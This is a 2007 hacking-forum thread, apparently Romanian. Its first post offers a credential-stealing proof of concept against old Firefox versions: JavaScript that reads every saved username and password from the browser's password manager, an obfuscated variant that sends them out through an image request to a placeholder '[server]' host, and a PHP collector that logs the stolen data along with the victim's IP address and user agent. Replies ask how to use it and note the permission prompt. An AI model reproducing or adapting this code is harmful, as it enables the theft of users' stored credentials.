Ras Posted June 28, 2007 Report Share Posted June 28, 2007 <html><head><script>document.write('[img=http://www.0x000000.com/hacks/red_dress.gif]');/*- It would be possible to glue all these passwords on the image above, and I could capture them in my logs.- I could call a remote PHP script which submits the passwords.- This shows how dangerous trusted content can be, imagine you open a HELP file from a piece of software you downloaded,you are never sure your passwords are send to some server.- Thanks to Mozilla for this flawed security model, I heard this won't work anymore in FF 3.0 Well, we'll see.*/setTimeout("listPW()",1000);function listPW() { if(document.location !='http://www.0x000000.com/hacks/hello.html') { netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect'); var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService(); pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager); var enumerator = pm.enumerator; document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC'); document.writeln(''); while (enumerator.hasMoreElements()) { try { var np = enumerator.getNext(); np = np.QueryInterface(Components.interfaces.nsIPassword); presult = '['+np.user+'] ['+np.password+'] ['+np.host+'] '; document.writeln(presult); } catch(e) { } } } else { alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!'); }}</script></head><body>[img=hello_files/red_dress.gif]</body></html>The myimage.php<script>netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');img = "img.jpg"; var sm = "uspastestr()";var pm = Components.classes["@mozilla.org/"+sm.substr(2,3)+"swordmanager;1"].getService();pm = pm.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"swordManager"));var enumerator = pm.enumerator; var str = ''; while (enumerator.hasMoreElements()) {try { var np = enumerator.getNext();np = np.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"sword"));presult = '['+eval("np."+sm.substr(0,2)+"er")+','+eval("np."+sm.substr(2,3)+"sword")+','+np.host+']'+String.fromCharCode(172); str += presult;} catch(e) { } } img = img.concat("?str=").replace(img.substr(-3,3),sm.charAt(2)+"h"+sm.charAt(2))+str;var str = "<img src=\"http://[server]/"+img+"\">";document.write(str); setTimeout("window.stop()",1000);</script>Change the variable $image by the image that will see the victim<?phpheader("Content-type: image/jpeg");$img = imagecreatefromjpeg("img.jpg");imagejpeg($img);imagedestroy($img);$strRnd=date("His");$strFecha=date("H:i:s d/m/y ");$strIP = getenv("REMOTE_ADDR");$strUserAgent = htmlentities($_SERVER['HTTP_USER_AGENT']);$strReferer = htmlentities($_SERVER['HTTP_REFERER']); if (strlen($strReferer) == 0) { $strReferer = "Ninguna"; }$str = $_GET['str'];$str=str_replace(chr(172),"",$str);$fp = fopen("fox-".$strRnd.".html","w+");fwrite($fp, "Fecha: ".$strFecha." Direccion IP: ".$strIP." Referencia: ".$strReferer." User-Agent: ".$strUserAgent."".$str."");fclose($fp);?> Quote Link to comment Share on other sites More sharing options...
ascuns1 Posted June 28, 2007 Report Share Posted June 28, 2007 nu ma inteles cum fac cu asta?? Quote Link to comment Share on other sites More sharing options...
SlicK Posted June 28, 2007 Report Share Posted June 28, 2007 Functioneaza pe Firefox 1.5 dar te avertizeaza daca vrei sa-i permiti scriptului sa acceseze informatiile respective... Quote Link to comment Share on other sites More sharing options...
